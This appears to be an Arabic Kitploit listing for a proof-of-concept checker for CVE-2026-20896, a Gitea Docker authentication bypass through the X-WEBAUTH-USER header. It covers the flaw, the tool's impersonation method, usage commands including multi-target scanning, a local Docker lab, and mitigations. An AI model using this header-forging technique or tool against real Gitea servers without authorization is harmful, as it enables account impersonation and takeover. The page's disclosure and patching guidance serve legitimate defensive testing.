Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER فاحص تجاوز المصادقة | Kitploit
أدوات/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER فاحص تجاوز المصادقة

عرض المستودع
10منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-20896 Gitea Docker Auth Bypass Checker

عمليات فريق أحمر/اختبار الاختراق المصرّح بها فقط.

يحتوي هذا المستودع على أداة فحص بسيطة لـ CVE-2026-20896، وهي ثغرة تجاوز للمصادقة في صور Gitea Docker الرسمية حتى الإصدار 1.26.2 ضمنًا، عندما يكون المصادقة عبر البروكسي العكسي مفعّلة.

ما هي CVE-2026-20896

صوّر Gitea Docker المتأثرة كانت تشحن قالب app.ini يحتوي على:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

عندما يقوم المسؤول بتفعيل:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

كان Gitea يثق بالهيدر X-WEBAUTH-USER القادم من أي عنوان IP يستطيع الوصول إلى منفذ HTTP للحاوية مباشرةً. أي عميل يتجاوز البروكسي المعاكس المخصص للمصادقة يمكنه إرسال هيدر واحد وانتحال شخصية مستخدم معروف أو قابل للتخمين.

التأثير العملي هو انتحال حساب بدون مصادقة. إذا كان المستخدم المُخمَّن مسؤولًا، فإن أسوأ الحالات هي السيطرة الكاملة على مستوى التطبيق على مثيل Gitea ومستودعاته. تنفيذ أوامر على المضيف (Host RCE) يعتمد على البيئة ولا تدّعي هذه الأداة تحقيقه.

الإصدارات المصححة تبدأ من 1.26.3؛ ويُنصح بالترقية إلى 1.26.4 أو أحدث.

كيف يعمل الـ PoC

تقوم الأداة بـ:

  1. جلب الصفحة الرئيسية للهدف.
  2. البحث عن نص التذييل مثل Powered by Gitea Version: 1.26.4.
  3. تخطي الاختبار افتراضيًا إذا كان الإصدار المُحلَّل هو >= 1.26.3.
  4. إرسال طلبات GET / مع هيدر X-WEBAUTH-USER: <username> لكل اسم مستخدم مُدخل.
  5. الإبلاغ عن إصابة عندما يبدو عنوان الصفحة المعروضة كلوحة تحكم مسجّل الدخول لذلك المستخدم.

إصدار Go يدعم أهدافًا متعددة، ملفات أسماء مستخدمين، توازيًا، مهلات، إخراج JSONL، TLS مع --insecure، و--dry-run، و--force.

البناء

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

لا توجد اعتماديات Go خارجية مطلوبة.

الاستخدام

هدف واحد:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

أهداف متعددة وأسماء مستخدمين:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

تشغيل تجريبي:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

البديل عبر Bash:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

أكواد الخروج

  • 0: تم تأكيد إصابة واحدة على الأقل بانتحال شخصية قابل للاستغلال
  • 1: لم يتم تأكيد أي انتحال شخصية قابل للاستغلال
  • 2: خطأ في الاستخدام، أو الإدخال، أو وقت التشغيل

مختبر إعادة الإنتاج المحلي

المختبر التالي يشغّل حاوية Gitea محلية متأثرة وينشئ مستخدم اختبار:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

النتيجة الإيجابية المتوقعة:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

التنظيف:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

التخفيف

  • قم بترقية Gitea إلى 1.26.3 أو أحدث؛ ويُفضَّل 1.26.4 أو أحدث.
  • لا تعرّض منفذ HTTP لحاوية Gitea الخلفية مباشرةً لشبكات غير موثوقة.
  • قم بتكوين البروكسيات المعاكسة الموثوقة بشكل صريح.
  • أبقِ المصادقة عبر البروكسي المعاكس معطّلة ما لم يكن مسار الشبكة وحدود الثقة الخاصة بالبروكسي مفهومة.

المراجع

  • نشرة Gitea الأمنية: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • ملاحظات إصدار Gitea لـ 1.26.3 / 1.26.4: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • PR الإصلاح: https://github.com/go-gitea/gitea/pull/38151
  • سجل CVE: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • تقرير الاستطلاع في البرية عبر The Hacker News / Sysdig telemetry: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
تنزيل الأداة